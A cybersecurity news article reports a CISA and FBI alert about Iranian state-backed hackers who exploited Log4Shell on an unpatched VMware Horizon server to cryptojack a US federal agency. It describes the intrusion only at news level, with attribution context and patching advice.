Cryptocurrency Fraud , Cyberwarfare / Nation-State Attacks , Fraud Management & Cybercrime

Iranian Hacker Group Uses Log4Shell to Cryptojack US Agency

Hackers Exploited an Unpatched VMWare Horizon Server to Gain Access
Iranian Hacker Group Uses Log4Shell to Cryptojack US Agency

Hackers sponsored by the Iranian government broke into an unnamed U.S. federal agency's network, stole passwords and implanted cryptocurrency mining software, cybersecurity officials disclosed Wednesday.

See Also: Securing Your Workforce with Datto RMM: Automating Patching, Hardening, and Backups

The Iranian group - an official security alert doesn't supply its name - exploited a vulnerability that was the subject of a governmentwide emergency patching directive issued last December - CVE-2021-44228, better known as Log4Shell. In this case, hackers found an unpatched instance of VMware Horizon servers.

Federal authorities have warned that the vulnerability in open-source Java utility Log4j is a favorite of nation-state hackers. The utility, maintained by The Apache Software Foundation, is often deployed as a software library in other applications, including other Apache applications and VMWare products. The Cyber Safety Review Board, a federally run committee, earlier this year characterized Log4Shell as an "endemic vulnerability" likely to cause problems for up to a decade and possibly even longer (see: Log4j Flaw Is 'Endemic,' Says Cyber Safety Review Board).

The state-backed hackers installed XMRig crypto mining software, moved laterally to the domain controller, compromised credentials and implanted Ngrok reverse proxies on several hosts to maintain persistence, the Cybersecurity and Infrastructure Security Agency and the FBI said in the government alert. The attack likely began in February. CISA says it detected the intrusion in April and worked with the agency in June and July to eradicate the hackers.

Whether the Iranians were acting wholly on Tehran's behalf, on their own behalf, or both, is uncertain. The Department of Justice in September indicted three Iranian hackers affiliated with the Islamic Revolutionary Guard Corps for ransomware without making a direct connection to state-sponsored attacks. A senior Department of Justice official speaking on condition of anonymity suggested the hackers were engaged in a financially motivated side project.

This incident could well be the same, said John Hultquist, head of intelligence analysis at cyberthreat intelligence firm Mandiant. "Iran and their peers depend on contractors to carry out cyberespionage and attack activities. Many of these contractors moonlight as criminals and it can be difficult to distinguish this activity from the work done at the behest of the state," he said.

Log4Shell is one of the most popular Java logging packages, downloaded by more than 51 million users since December 2021, and 38% of those are still vulnerable, according to one industry estimate.

To prevent cyberattacks against the vulnerable systems, CISA and the FBI recommend that organizations update VMware Horizon and unified access gateway systems to the latest versions. The vulnerable versions are detailed in VMWare's security advisory and knowledge base.

About the Author

Rashmi Ramesh

Rashmi Ramesh

Assistant Editor, Global News Desk, ISMG

Ramesh has seven years of experience writing and editing stories on finance, enterprise and consumer technology, and diversity and inclusion. She has previously worked at formerly News Corp-owned TechCircle, business daily The Economic Times and The New Indian Express.

Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing, you agree to our use of cookies.